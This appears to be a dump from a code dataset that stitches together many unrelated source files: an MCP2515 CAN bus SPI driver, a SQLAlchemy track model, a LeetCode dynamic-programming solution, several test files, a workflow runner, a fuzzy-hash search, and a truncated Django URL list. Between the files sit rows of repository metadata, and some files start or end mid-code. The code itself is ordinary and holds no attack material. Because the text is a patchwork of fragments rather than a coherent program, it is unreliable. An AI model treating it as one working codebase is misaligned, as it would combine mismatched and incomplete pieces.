    TXB2DLC = 0x55
    TXB2D0 = 0x56
    TXB2D1 = 0x57
    TXB2D2 = 0x58
    TXB2D3 = 0x59
    TXB2D4 = 0x5A
    TXB2D5 = 0x5B
    TXB2D6 = 0x5C
    TXB2D7 = 0x5D

    # Rx Buffer 0
    RXB0CTRL = 0x60
    RXB0SIDH = 0x61
    RXB0SIDL = 0x62
    RXB0EID8 = 0x63
    RXB0EID0 = 0x64
    RXB0DLC = 0x65
    RXB0D0 = 0x66
    RXB0D1 = 0x67
    RXB0D2 = 0x68
    RXB0D3 = 0x69
    RXB0D4 = 0x6A
    RXB0D5 = 0x6B
    RXB0D6 = 0x6C
    RXB0D7 = 0x6D

    # Rx Buffer 1
    RXB1CTRL = 0x70
    RXB1SIDH = 0x71
    RXB1SIDL = 0x72
    RXB1EID8 = 0x73
    RXB1EID0 = 0x74
    RXB1DLC = 0x75
    RXB1D0 = 0x76
    RXB1D1 = 0x77
    RXB1D2 = 0x78
    RXB1D3 = 0x79
    RXB1D4 = 0x7A
    RXB1D5 = 0x7B
    RXB1D6 = 0x7C
    RXB1D7 = 0x7D

    # ------------------------------------------------------------------
    # Bit register masks
    # ------------------------------------------------------------------
    # TXBnCTRL
    TXREQ = 0x08
    TXP = 0x03
    # RXBnCTRL
    RXM = 0x60
    BUKT = 0x04
    # CANCTRL
    REQOP = 0xE0
    ABAT = 0x10
    OSM = 0x08
    CLKEN = 0x04
    CLKPRE = 0x03
    # CANSTAT (REQOP mask is identical to CANCTRL's)
    ICOD = 0x0E
    # CANINTE interrupt-enable bits
    RX0IE = 0x01
    RX1IE = 0x02
    TX0IE = 0x04
    TX1IE = 0x08   # was 0x80: collided with MERRE; bit 3 per datasheet
    TX2IE = 0x10
    ERRIE = 0x20
    WAKIE = 0x40
    MERRE = 0x80
    # CANINTF interrupt flags
    RX0IF = 0x01
    RX1IF = 0x02
    TX0IF = 0x04
    TX1IF = 0x08   # was 0x80: collided with MERRF; bit 3 per datasheet
    TX2IF = 0x10
    ERRIF = 0x20
    WAKIF = 0x40
    MERRF = 0x80
    # BFPCTRL
    B1BFS = 0x20
    B0BFS = 0x10
    B1BFE = 0x08
    B0BFE = 0x04
    B1BFM = 0x02
    B0BFM = 0x01
    # CNF1 masks
    SJW = 0xC0
    BRP = 0x3F
    # CNF2 masks
    BTLMODE = 0x80
    SAM = 0x40
    PHSEG1 = 0x38
    PRSEG = 0x07
    # CNF3 masks
    WAKFIL = 0x40
    PHSEG2 = 0x07
    # TXRTSCTRL masks
    TXB2RTS = 0x04
    TXB1RTS = 0x02
    TXB0RTS = 0x01

    # ------------------------------------------------------------------
    # Bit timing configuration
    # ------------------------------------------------------------------
    # CNF1: SJW occupies bits 7:6, value = (length in TQ) - 1.
    SJW_1TQ = 0x00   # was 0x40 (that is the 2TQ encoding)
    SJW_2TQ = 0x40   # was 0x80
    SJW_3TQ = 0x80   # was 0x90, which is outside the 0xC0 SJW field
    SJW_4TQ = 0xC0
    # CNF2
    BTLMODE_CNF3 = 0x80
    BTLMODE_PH1_IPT = 0x00
    SMPL_3X = 0x40
    SMPL_1X = 0x00
    PHSEG1_8TQ = 0x38
    PHSEG1_7TQ = 0x30
    PHSEG1_6TQ = 0x28
    PHSEG1_5TQ = 0x20
    PHSEG1_4TQ = 0x18
    PHSEG1_3TQ = 0x10
    PHSEG1_2TQ = 0x08
    PHSEG1_1TQ = 0x00
    PRSEG_8TQ = 0x07
    PRSEG_7TQ = 0x06
    PRSEG_6TQ = 0x05
    PRSEG_5TQ = 0x04
    PRSEG_4TQ = 0x03
    PRSEG_3TQ = 0x02
    PRSEG_2TQ = 0x01
    PRSEG_1TQ = 0x00
    # CNF3
    PHSEG2_8TQ = 0x07
    PHSEG2_7TQ = 0x06
    PHSEG2_6TQ = 0x05
    PHSEG2_5TQ = 0x04
    PHSEG2_4TQ = 0x03
    PHSEG2_3TQ = 0x02
    PHSEG2_2TQ = 0x01
    PHSEG2_1TQ = 0x00
    SOF_ENABLED = 0x80
    WAKFIL_ENABLED = 0x40
    WAKFIL_DISABLED = 0x00

    # ------------------------------------------------------------------
    # Control/configuration register values
    # ------------------------------------------------------------------
    # CANINTE
    RX0IE_ENABLED = 0x01
    RX0IE_DISABLED = 0x00
    RX1IE_ENABLED = 0x02
    RX1IE_DISABLED = 0x00
    G_RXIE_ENABLED = 0x03
    G_RXIE_DISABLED = 0x00
    TX0IE_ENABLED = 0x04
    TX0IE_DISABLED = 0x00
    TX1IE_ENABLED = 0x08
    TX1IE_DISABLED = 0x00   # was a duplicate TX2IE_DISABLED assignment
    TX2IE_ENABLED = 0x10
    TX2IE_DISABLED = 0x00
    G_TXIE_ENABLED = 0x1C
    G_TXIE_DISABLED = 0x00
    ERRIE_ENABLED = 0x20
    ERRIE_DISABLED = 0x00
    WAKIE_ENABLED = 0x40
    WAKIE_DISABLED = 0x00
    IVRE_ENABLED = 0x80
    IVRE_DISABLED = 0x00
    # CANINTF
    RX0IF_SET = 0x01
    RX0IF_RESET = 0x00
    RX1IF_SET = 0x02
    RX1IF_RESET = 0x00
    TX0IF_SET = 0x04
    TX0IF_RESET = 0x00
    TX1IF_SET = 0x08
    TX1IF_RESET = 0x00      # was a duplicate TX2IF_RESET assignment
    TX2IF_SET = 0x10
    TX2IF_RESET = 0x00
    ERRIF_SET = 0x20
    ERRIF_RESET = 0x00
    WAKIF_SET = 0x40
    WAKIF_RESET = 0x00
    IVRF_SET = 0x80
    IVRF_RESET = 0x00
    # CANCTRL
    REQOP_CONFIG = 0x80
    REQOP_LISTEN = 0x60
    REQOP_LOOPBACK = 0x40
    REQOP_SLEEP = 0x20
    REQOP_NORMAL = 0x00
    ABORT = 0x10
    OSM_ENABLED = 0x08
    CLKOUT_ENABLED = 0x04
    CLKOUT_DISABLED = 0x00
    CLKOUT_PRE_8 = 0x03
    CLKOUT_PRE_4 = 0x02
    CLKOUT_PRE_2 = 0x01
    CLKOUT_PRE_1 = 0x00
    # CANSTAT
    OPMODE_CONFIG = 0x80
    OPMODE_LISTEN = 0x60
    OPMODE_LOOPBACK = 0x40
    OPMODE_SLEEP = 0x20
    OPMODE_NORMAL = 0x00
    # RXBnCTRL
    RXM_RCV_ALL = 0x60
    RXM_VALID_EXT = 0x40
    RXM_VALID_STD = 0x20
    RXM_VALID_ALL = 0x00
    RXRTR_REMOTE = 0x08
    RXRTR_NO_REMOTE = 0x00
    BUKT_ROLLOVER = 0x04
    BUKT_NO_ROLLOVER = 0x00
    FILHIT0_FLTR_1 = 0x01
    FILHIT0_FLTR_0 = 0x00
    FILHIT1_FLTR_5 = 0x05
    FILHIT1_FLTR_4 = 0x04
    FILHIT1_FLTR_3 = 0x03
    FILHIT1_FLTR_2 = 0x02
    FILHIT1_FLTR_1 = 0x01
    FILHIT1_FLTR_0 = 0x00
    # TXBnCTRL
    TXREQ_SET = 0x08
    TXREQ_CLEAR = 0x00
    TXP_HIGHEST = 0x03
    TXP_INTER_HIGH = 0x02
    TXP_INTER_LOW = 0x01
    TXP_LOWEST = 0x00

    # Data length codes
    DLC_0 = 0x00
    DLC_1 = 0x01
    DLC_2 = 0x02
    DLC_3 = 0x03
    DLC_4 = 0x04
    DLC_5 = 0x05
    DLC_6 = 0x06
    DLC_7 = 0x07
    DLC_8 = 0x08

    # CAN SPI commands (aliases of the SPI_* instruction set above)
    CAN_RESET = 0xC0
    CAN_READ = 0x03
    CAN_WRITE = 0x02
    CAN_RTS = 0x80
    CAN_RTS_TXB0 = 0x81
    CAN_RTS_TXB1 = 0x82
    CAN_RTS_TXB2 = 0x84
    CAN_RD_STATUS = 0xA0
    CAN_BIT_MODIFY = 0x05
    CAN_RX_STATUS = 0xB0
    CAN_RD_RX_BUFF = 0x90
    CAN_LOAD_TX = 0x40

    # Miscellaneous
    DUMMY_BYTE = 0x00
    TXB0 = 0x31
    TXB1 = 0x41
    TXB2 = 0x51
    RXB0 = 0x61
    RXB1 = 0x71
    EXIDE_SET = 0x08
    EXIDE_RESET = 0x00

    # Bit-rate presets (CNF1 BRP values used by this board's clock)
    CAN_10Kbps = 0x31
    CAN_25Kbps = 0x13
    CAN_50Kbps = 0x09
    CAN_100Kbps = 0x04
    CAN_125Kbps = 0x03
    CAN_250Kbps = 0x01
    CAN_500Kbps = 0x00

    def __init__(self):
        """Open SPI bus 0, device 0 (mode 3, 500 kHz) and reset the chip."""
        self.spi = spidev.SpiDev()
        self.spi.open(0, 0)
        self.spi.max_speed_hz = 500000
        self.spi.mode = 0b11
        command = [self.SPI_RESET]
        self.spi.writebytes(command)

    def WriteRegister(self, Register, Data):
        """Write the list of bytes *Data* starting at address *Register*."""
        command = [self.SPI_WRITE, Register] + Data
        self.spi.writebytes(command)

    def ReadRegister(self, Register, n):
        """Read *n* consecutive registers starting at *Register*.

        Returns the list of *n* register values.  Fix: spidev's xfer()
        returns the received bytes and does not modify its argument, so the
        response must be captured (the original returned its own zero
        padding).
        """
        resp = self.spi.xfer([self.SPI_READ, Register] + [0] * n)
        # First two response bytes correspond to the command/address phase.
        return resp[2:]

    def BitModify(self, Register, Mask, Value):
        """Set the bits selected by *Mask* in *Register* to *Value*."""
        command = [self.SPI_BIT_MODIFY, Register] + [Mask, Value]
        self.spi.writebytes(command)

    def ReadStatus(self, type):
        """Issue a status command (READ_STATUS / RX_STATUS) and return the
        status byte.

        Fix: as in ReadRegister, the xfer() return value must be captured;
        the original always returned the 0xFF dummy it sent.
        """
        resp = self.spi.xfer([type, 0xFF])
        return resp[1]
| 22.256018 | 79 | 0.478714 | 10,135 | 0.996461 | 0 | 0 | 0 | 0 | 0 | 0 | 1,830 | 0.179923 |
2bb62b6a718f65b1214f64e28be9ca336c62449b | 3,809 | py | Python | model/grouptrack.py | janhradek/regaudio | e3ead0b19f016c645985e5f779414076306be7e0 | [
"Zlib"
] | null | null | null | model/grouptrack.py | janhradek/regaudio | e3ead0b19f016c645985e5f779414076306be7e0 | [
"Zlib"
] | null | null | null | model/grouptrack.py | janhradek/regaudio | e3ead0b19f016c645985e5f779414076306be7e0 | [
"Zlib"
] | null | null | null | import sqlalchemy
from .base import Base
from .track import Track
import model.tracktime
class GroupTrack(Base):
'''
a link between group and track (association pattern)
backrefs group and track (not listed here)
To use this first create the group, then group tracks,
then tracks and add them to grouptracks,
then add grouptracks to group
Association Object
'''
__tablename__ = "grouptracks"
idno = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
trackid = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey("tracks.idno"))#, primary_key = True)
groupid = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey("groups.idno"))#, primary_key = True)
no = sqlalchemy.Column(sqlalchemy.Integer)
# time doesnt work well with qt mvc and with python
fromms = sqlalchemy.Column(sqlalchemy.Integer)
lengthms = sqlalchemy.Column(sqlalchemy.Integer)
#track = sqlalchemy.orm.relationship("Track", backref="grouptracks")
headers = Track.headers[:]
headers.insert(0, "No")
headers.append("From")
headers.append("Length")
innerheaders = 1 # the track headers start from second index
def __init__(self, no, froms, lengths):
self.no = no
self.fromms = froms
self.lengthms = lengths
def bycol(self, col, newvalue=None, edit=False):
col = GroupTrack.translatecol(col)
if col < 0:
return self.track.bycol(-1-col, newvalue, edit)
if col == 0:
if newvalue != None:
self.no = newvalue
return True
return self.no
elif col == 1:
if newvalue != None:
nw, ok = model.tracktime.strtototal(newvalue)
if ok: self.fromms = nw
return ok
return model.tracktime.totaltostr(self.fromms, edit)
elif col == 2:
if newvalue != None:
nw, ok = model.tracktime.strtototal(newvalue)
if ok: self.lengthms = nw
return ok
return model.tracktime.totaltostr(self.lengthms, edit)
return None
def tipbycol(self, col):
col = GroupTrack.translatecol(col)
if col < 0:
return self.track.tipbycol(-1-col)
return None
@classmethod
def colbycol(cls, col):
col = cls.translatecol(col)
if col < 0:
return Track.colbycol(-1-col)
if col == 0:
return cls.no
elif col == 1:
return cls.fromms
elif col == 2:
return cls.lengthms
@classmethod
def isStar(cls,col):
col = cls.translatecol(col)
if col < 0:
return Track.isStar(-1-col)
else:
return False
@classmethod
def isCheck(cls, col):
col = cls.translatecol(col)
if col < 0:
return Track.isCheck(-1-col)
else:
return False
@classmethod
def translatecol(cls, col):
'''
"translate" the column number to the Track or to local index
a column in grouptrack (positive) or track (negative - 1)
'''
if col >= cls.innerheaders and col < cls.innerheaders + len(Track.headers):
return cls.innerheaders - col - 1
elif col >= cls.innerheaders + len(Track.headers):
return col - len(Track.headers)
return col
@classmethod
def translateorder(cls, direction, col):
"""translate the column number to/from Track
if direction then translate to track
return < 0 if the col doesn't have counterpart
"""
if direction: # gt -> t
return -1 - cls.translatecol(col)
else: # t -> gt
return cls.innerheaders + col
| 30.96748 | 111 | 0.593594 | 3,717 | 0.975847 | 0 | 0 | 1,462 | 0.383828 | 0 | 0 | 866 | 0.227356 |
2bb8dd1b3871424dc498a9ab4db3881c1e6c6772 | 1,584 | py | Python | LeetCodeSolver/pythonSolutions/from201to300/Solution213.py | ZeromaXHe/Learning-Platform | ec75c2dbd472a568d1cd482450cc471295659c62 | [
"Apache-2.0"
] | null | null | null | LeetCodeSolver/pythonSolutions/from201to300/Solution213.py | ZeromaXHe/Learning-Platform | ec75c2dbd472a568d1cd482450cc471295659c62 | [
"Apache-2.0"
] | null | null | null | LeetCodeSolver/pythonSolutions/from201to300/Solution213.py | ZeromaXHe/Learning-Platform | ec75c2dbd472a568d1cd482450cc471295659c62 | [
"Apache-2.0"
] | null | null | null | from typing import List
class Solution:
"""
213.打家劫舍II | 难度:中等 | 标签:动态规划
你是一个专业的小偷,计划偷窃沿街的房屋,每间房内都藏有一定的现金。这个地方所有的房屋都 围成一圈 ,这意味着第一个房屋和最后一个房屋是紧挨着的。同时,相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警 。
<p>
给定一个代表每个房屋存放金额的非负整数数组,计算你 在不触动警报装置的情况下 ,能够偷窃到的最高金额。
<p>
示例 1:
输入:nums = [2,3,2]
输出:3
解释:你不能先偷窃 1 号房屋(金额 = 2),然后偷窃 3 号房屋(金额 = 2), 因为他们是相邻的。
<p>
示例 2:
输入:nums = [1,2,3,1]
输出:4
解释:你可以先偷窃 1 号房屋(金额 = 1),然后偷窃 3 号房屋(金额 = 3)。
偷窃到的最高金额 = 1 + 3 = 4 。
<p>
示例 3:
输入:nums = [0]
输出:0
<p>
提示:
1 <= nums.length <= 100
0 <= nums[i] <= 1000
<p>
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/house-robber-ii
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
def rob(self, nums: List[int]) -> int:
"""
执行用时: 44 ms , 在所有 Python3 提交中击败了 36.21% 的用户
内存消耗: 15 MB , 在所有 Python3 提交中击败了 17.47% 的用户
:param nums:
:return:
"""
n = len(nums)
if n == 1:
return nums[0]
if n == 2:
return max(nums[1], nums[0])
dp_no_rob_first = [0] * n
dp_rob_first = [0] * n
dp_no_rob_first[0] = 0
dp_no_rob_first[1] = nums[1]
dp_rob_first[0] = nums[0]
dp_rob_first[1] = max(nums[1], nums[0])
for i in range(2, n):
dp_rob_first[i] = max(dp_rob_first[i - 2] + nums[i], dp_rob_first[i - 1])
dp_no_rob_first[i] = max(dp_no_rob_first[i - 2] + nums[i], dp_no_rob_first[i - 1])
return max(dp_no_rob_first[n - 1], dp_rob_first[n - 2])
| 27.789474 | 125 | 0.541667 | 2,291 | 0.988352 | 0 | 0 | 0 | 0 | 0 | 0 | 1,600 | 0.69025 |
2bb98fcaa1938a0b80ec364136a3876078651d5b | 2,083 | py | Python | dialogs.py | 6dba/async-telegram-bot | 3950f5bc51be9f2f93924442948a98db52332d8e | [
"MIT"
] | null | null | null | dialogs.py | 6dba/async-telegram-bot | 3950f5bc51be9f2f93924442948a98db52332d8e | [
"MIT"
] | null | null | null | dialogs.py | 6dba/async-telegram-bot | 3950f5bc51be9f2f93924442948a98db52332d8e | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from aiogram.types import ReplyKeyboardRemove, \
ReplyKeyboardMarkup, KeyboardButton, \
InlineKeyboardMarkup, InlineKeyboardButton
"""Диалоги бота"""
@dataclass(frozen=True)
class Messages:
SMILE = ['🤷♀️','🧐','🤷♂️','🤔','😐','🤨','🤯','🥱','👀','👋','💊','🙅♀️','🎇','🗿']
start_html: str = "Добро пожаловать, <b>{first_name}!</b> 🕺\nЯ бот, созданный для того, чтобы напоминать тебе - пора пить таблеточки!"
help: str = """<b>Я бот - помощник!</b> 🗿\nУмею напоминать о том, что пора принимать лекарства! 🧬\n\nВ главном меню ты сможешь создать, просмотреть или редактировать напоминание 😯\n\nНажав на название препарата, можно перейти в магазин, чтобы изучить подробнее или даже купить! 💸\n\nДавай начнём, пиши: /menu 📌"""
mainMenu: str = "🔮 Выбери действие:"
edit: str = "🔮 Выбери действие:"
start_addplan: str = "Я задам несколько вопросов, прошу отвечать корректно 🙆"
drug_name_addplan: str = "Как называется препарат? 🤨"
allday_message: str = "Напоминания будут приходить в течение дня: \n\nУтром - 08:00\nДнём - 12:00\nВечером - 18:00\n"
idontknow: str = "<b>Я не знаю, что с этим делать</b> 🤷♀️\nНапомню, есть команда: /help"
None_pills: str = "<b>Пусто..</b>\nКажется, у тебя ещё не добавлено никаких напоминаний 🧐 \nСамое время начать!🗿"
pills_limit: str = "Хэй-хэй, слишком много таблеточек добавляешь! \nПопробуй удалить уже оконченные курсы..🗿"
drug_exist: str = "Думаю, такой уже есть.. "
input_error: str = "Попробуй ввести ещё раз.. "
input_error_time: str = "Напиши что-то в формате: <u><i>19:00</i></u> или <u><i>09:25</i></u> "
input_unreal: str = "Хм.. Не верю.. Попробуй ввести ещё раз "
input_more_than_need: str = "Хм.. Не думаю, что стоит пить больше, чем нужно.. Попробуй ввести ещё раз "
input_error_dose: str = "Напиши что-то в формате: <u><i>1</i></u> или <u><i>0.25</i></u> "
exist_drug_and_dose: str = "Думаю, препарат с данной дозировкой уже есть.. "
message = Messages()
| 40.057692 | 318 | 0.649544 | 2,743 | 0.911296 | 0 | 0 | 2,768 | 0.919601 | 0 | 0 | 2,248 | 0.746844 |
2bbb687f364745f2b77d52b36e535e60715406d8 | 1,584 | py | Python | reflexy/base/tests/test_reflex.py | eso/reflexy | 5ea03bae806488c01a53ccffe9701066baa5964d | [
"BSD-3-Clause"
] | null | null | null | reflexy/base/tests/test_reflex.py | eso/reflexy | 5ea03bae806488c01a53ccffe9701066baa5964d | [
"BSD-3-Clause"
] | null | null | null | reflexy/base/tests/test_reflex.py | eso/reflexy | 5ea03bae806488c01a53ccffe9701066baa5964d | [
"BSD-3-Clause"
] | null | null | null | import unittest
from reflexy.base import reflex
class TestReflexModule(unittest.TestCase):
sof = 'datasetname|file1.fits;PRO_CATG1;PURPOSE1:PURPOSE2,file2;' \
'PRO_CAT2;PURPOSE1'
sopexp = [('long_param1', '3'), ('param2', '3'), ('param3', 'ser'),
('param_not_shown', 'none')]
sop = 'recipe_name:long_param1=3,recipe_name:param2=3,' \
'recipe_name:param3=ser,recipe_name:param_not_shown=none'
def test_parseSof(self):
r = reflex.parseSof(self.sof)
self.assertEqual(len(r), 2)
self.assertEqual(r.datasetName, 'datasetname')
f1, f2 = r.files
self.assertEqual(f1.name, 'file1.fits')
self.assertEqual(f1.category, 'PRO_CATG1')
self.assertEqual(len(f1.purposes), 2)
self.assertIn('PURPOSE1', f1.purposes)
self.assertIn('PURPOSE2', f1.purposes)
self.assertEqual(f2.name, 'file2')
self.assertEqual(f2.category, 'PRO_CAT2')
self.assertEqual(len(f2.purposes), 1)
self.assertEqual(f2.purposes[0], 'PURPOSE1')
def test_parseRoundTripJson(self):
r = reflex.parseSof(self.sof)
j = r.toJSON()
r2 = reflex.parseSofJson(j)
self.assertEqual(r, r2)
def test_parseSop(self):
r = reflex.parseSop(self.sop)
self.assertEqual(len(r), len(self.sopexp))
for p, ep in zip(r, self.sopexp):
self.assertEqual(p.recipe, 'recipe_name')
self.assertEqual(p.displayName, ep[0])
self.assertEqual(p.value, ep[1])
if __name__ == "__main__":
unittest.main()
| 35.2 | 71 | 0.625631 | 1,485 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 353 | 0.222854 |
2bbc1f15ebca775f3d32d7270961e05f3489946d | 1,240 | py | Python | usaspending_api/common/tests/test_limitable_serializer.py | truthiswill/usaspending-api | bd7d915442e2ec94cc830c480ceeffd4479be6c0 | [
"CC0-1.0"
] | null | null | null | usaspending_api/common/tests/test_limitable_serializer.py | truthiswill/usaspending-api | bd7d915442e2ec94cc830c480ceeffd4479be6c0 | [
"CC0-1.0"
] | 3 | 2020-02-12T01:16:46.000Z | 2021-06-10T20:36:57.000Z | usaspending_api/common/tests/test_limitable_serializer.py | truthiswill/usaspending-api | bd7d915442e2ec94cc830c480ceeffd4479be6c0 | [
"CC0-1.0"
] | null | null | null | import pytest
import json
from model_mommy import mommy
from usaspending_api.awards.models import Award
@pytest.fixture
def mock_limitable_data():
mommy.make(Award, _fill_optional=True)
@pytest.mark.django_db
def test_nested_field_limiting(client, mock_limitable_data):
request_object = {
"fields": ["piid", "recipient__recipient_name"]
}
response = client.post(
"/api/v1/awards/",
content_type='application/json',
data=json.dumps(request_object),
format='json')
results = response.data["results"][0]
assert "piid" in results.keys()
assert "recipient" in results.keys()
assert "recipient_name" in results.get("recipient", {}).keys()
@pytest.mark.django_db
def test_nested_field_exclusion(client, mock_limitable_data):
request_object = {
"exclude": ["piid", "recipient__recipient_name"]
}
response = client.post(
"/api/v1/awards/",
content_type='application/json',
data=json.dumps(request_object),
format='json')
results = response.data["results"][0]
assert "piid" not in results.keys()
assert "recipient" in results.keys()
assert "recipient_name" not in results.get("recipient").keys()
| 24.8 | 66 | 0.678226 | 0 | 0 | 0 | 0 | 1,125 | 0.907258 | 0 | 0 | 271 | 0.218548 |
2bbd518b542fcf51bf60ace183944d104900efbf | 55 | py | Python | luigi/contrib/__init__.py | Mappy/luigi | 539cd2cf69902bb6cef688afdf55e991cae4b537 | [
"Apache-2.0"
] | 2 | 2017-05-03T12:15:20.000Z | 2018-09-14T02:28:54.000Z | luigi/contrib/__init__.py | Mappy/luigi | 539cd2cf69902bb6cef688afdf55e991cae4b537 | [
"Apache-2.0"
] | null | null | null | luigi/contrib/__init__.py | Mappy/luigi | 539cd2cf69902bb6cef688afdf55e991cae4b537 | [
"Apache-2.0"
] | null | null | null | """Package containing optional and-on functionality.""" | 55 | 55 | 0.781818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55 | 1 |
2bbd83bd7fa3a6706dcfa519b317d2baf63d98d2 | 1,993 | py | Python | ronny/runner.py | ynop/ronny | f40c0d22d02c70bb7994f84db11ead45208b6287 | [
"MIT"
] | null | null | null | ronny/runner.py | ynop/ronny | f40c0d22d02c70bb7994f84db11ead45208b6287 | [
"MIT"
] | null | null | null | ronny/runner.py | ynop/ronny | f40c0d22d02c70bb7994f84db11ead45208b6287 | [
"MIT"
] | null | null | null | import sys
import argparse
import os
import re
import yaml
from . import workflow
class Runner(object):
tasks = [
]
out_and_cache_subfolder_with_sumatra_label = True
def run(self):
parser = argparse.ArgumentParser(description='Run workflow')
parser.add_argument('config_path', type=str)
parser.add_argument('--workdir', type=str, default=None)
parser.add_argument('--out', type=str, default=None)
parser.add_argument('--cache', type=str, default=None)
parser.add_argument('--range', type=str, default=None)
args = parser.parse_args()
config = self._load_config(args.config_path)
out_path = args.out
cache_path = args.cache
if self.out_and_cache_subfolder_with_sumatra_label and 'sumatra_label' in config:
if out_path:
out_path = os.path.join(out_path, config['sumatra_label'])
if cache_path:
cache_path = os.path.join(cache_path, config['sumatra_label'])
tasks = []
if args.range:
single_id_match = re.match(r'^(\d*)$', args.range)
start_end_match = re.match(r'^(\d*)-(\d*)$', args.range)
if single_id_match is not None:
tasks = [int(single_id_match.group(1))]
elif start_end_match is not None:
start = int(start_end_match.group(1))
end = int(start_end_match.group(2))
if end >= start:
tasks = [x for x in range(start, end + 1)]
wf = workflow.Workflow(config, available_tasks=self._get_task_dictionary(), work_dir=args.workdir, output_path=out_path,
cache_path=cache_path)
wf.run(tasks_to_execute=tasks)
def _get_task_dictionary(self):
return {k.name: k for k in self.tasks}
def _load_config(self, path):
with open(path, 'r') as yml_file:
cfg = yaml.load(yml_file)
return cfg
| 30.661538 | 128 | 0.60562 | 1,906 | 0.956347 | 0 | 0 | 0 | 0 | 0 | 0 | 137 | 0.068741 |
2bbda0a6bf0bc0ed91be9d1635d26984ee81885c | 1,422 | py | Python | src/Query/apifuzz.py | codexgigassys/codex-backend | 1e6b946f05e2fd9ce80b207046fe168f49cc2db2 | [
"MIT"
] | 161 | 2016-08-03T14:25:20.000Z | 2021-08-11T03:18:35.000Z | src/Query/apifuzz.py | codexgigassys/codex-backend | 1e6b946f05e2fd9ce80b207046fe168f49cc2db2 | [
"MIT"
] | 115 | 2016-08-08T09:24:08.000Z | 2020-03-07T06:48:02.000Z | src/Query/apifuzz.py | codexgigassys/codex-backend | 1e6b946f05e2fd9ce80b207046fe168f49cc2db2 | [
"MIT"
] | 46 | 2016-08-04T08:25:28.000Z | 2021-09-05T23:46:55.000Z | # Copyright (C) 2016 Deloitte Argentina.
# This file is part of CodexGigas - https://github.com/codexgigassys/
# See the file 'LICENSE' for copying permission.
import pathmagic
from pymongo import MongoClient
import ssdeep
from env import envget
def searchFuzzy(fuzz, limit, thresh):
client = MongoClient(envget('metadata.host'), envget('metadata.port'))
db = client[envget('db_metadata_name')]
coll_meta = db["db_metadata_collection"]
f1 = coll_meta.find({}, {"file_id": 1, "fuzzy_hash": 1}).limit(limit)
l = []
for f in f1:
l.append(f)
ret = {}
for a in l:
res = -1
try:
res = ssdeep.compare(a["fuzzy_hash"], fuzz)
except InternalError:
print(str(res) + "------" +
str(a["fuzzy_hash"]) + "-----" + str(a["file_id"]))
continue
if(res >= thresh):
ret[a["file_id"]] = res
return ret
def searchFull(search, limit):
# print("1")
client = MongoClient(envget('metadata.host'), envget('metadata.port'))
# print("2")
db = client[envget('db_metadata_name')]
# print("3")
coll_meta = db["db_metadata_collection"]
# print("4")
f1 = coll_meta.find(search).limit(limit)
# print("5")
l = []
for f in f1:
l.append(f)
# print("6")
ret = []
for a in l:
ret.append(str(a["file_id"]))
# print("7")
return ret
| 25.392857 | 74 | 0.573136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 472 | 0.331927 |
2bbdc05950e7d038fdccba28a8a2efe5bcf61d8a | 1,278 | py | Python | sample_dmatrix.py | daimeng/py-geode | a4146804e4def71a6b430e5a16f6e0b1a65deefe | [
"MIT"
] | null | null | null | sample_dmatrix.py | daimeng/py-geode | a4146804e4def71a6b430e5a16f6e0b1a65deefe | [
"MIT"
] | 9 | 2018-11-15T00:44:11.000Z | 2019-03-01T02:52:34.000Z | sample_dmatrix.py | daimeng/py-geode | a4146804e4def71a6b430e5a16f6e0b1a65deefe | [
"MIT"
] | null | null | null | import aiohttp
import pandas as pd
import sys
import asyncio
from geode.dispatcher import AsyncDispatcher
async def main():
client = await AsyncDispatcher.init()
origins_file = sys.argv[1]
destinations_file = sys.argv[2]
origf = pd.read_csv(origins_file)[['lat', 'lon']].round(4).drop_duplicates()
destf = pd.read_csv(destinations_file)[['lat', 'lon']].round(4).drop_duplicates()
appendf = None
append_file = None
if len(sys.argv) >= 4:
append_file = sys.argv[3]
appendf = pd.read_csv(append_file)
appendf = appendf[appendf.source == 'google'].drop_duplicates()
appendf.set_index(pd.MultiIndex.from_arrays([appendf.olat, appendf.olon, appendf.dlat, appendf.dlon]), inplace=True)
origs = origf.values
dests = destf.values
async with aiohttp.ClientSession() as session:
res = await client.distance_matrix(
origins=origs,
destinations=dests,
session=session,
provider='google'
)
df = res.reset_index()
if append_file:
df.to_csv(append_file, mode='a', index=False, header=False, chunksize=1000)
else:
df.to_csv('test.csv', index=False, chunksize=1000)
if __name__ == '__main__':
asyncio.run(main())
| 27.782609 | 124 | 0.654147 | 0 | 0 | 0 | 0 | 0 | 0 | 1,115 | 0.872457 | 59 | 0.046166 |
2bbe4807e1342fac308483071d778e38b6d71f3f | 2,959 | py | Python | yasql/apps/sqlorders/urls.py | Fanduzi/YaSQL | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | [
"Apache-2.0"
] | 443 | 2018-02-08T02:53:48.000Z | 2020-10-13T10:01:55.000Z | yasql/apps/sqlorders/urls.py | Fanduzi/YaSQL | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | [
"Apache-2.0"
] | 27 | 2020-10-14T10:01:52.000Z | 2022-03-12T00:49:47.000Z | yasql/apps/sqlorders/urls.py | Fanduzi/YaSQL | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | [
"Apache-2.0"
] | 148 | 2018-03-15T06:07:25.000Z | 2020-08-17T14:58:45.000Z | # -*- coding:utf-8 -*-
# edit by fuzongfei
from django.urls import path
from sqlorders import views
urlpatterns = [
# SQL工单
path('envs', views.GetDBEnvironment.as_view(), name='v1.sqlorders.db-environment'),
path('schemas', views.GetDbSchemas.as_view(), name='v1.sqlorders.db-schemas'),
path('incep/syntaxcheck', views.IncepSyntaxCheckView.as_view(), name='v1.sqlorders.incep.syntaxcheck'),
path('commit', views.SqlOrdersCommit.as_view(), name='v1.sqlorders.commit'),
path('list', views.SqlOrdersList.as_view(), name='v1.sqlorders.list'),
path('detail/<str:order_id>', views.SqlOrdersDetail.as_view(), name='v1.sqlorders.detail'),
path('op/approve/<int:pk>', views.OpSqlOrderView.as_view({"put": "approve"}), name='v1.sqlorders.approve'),
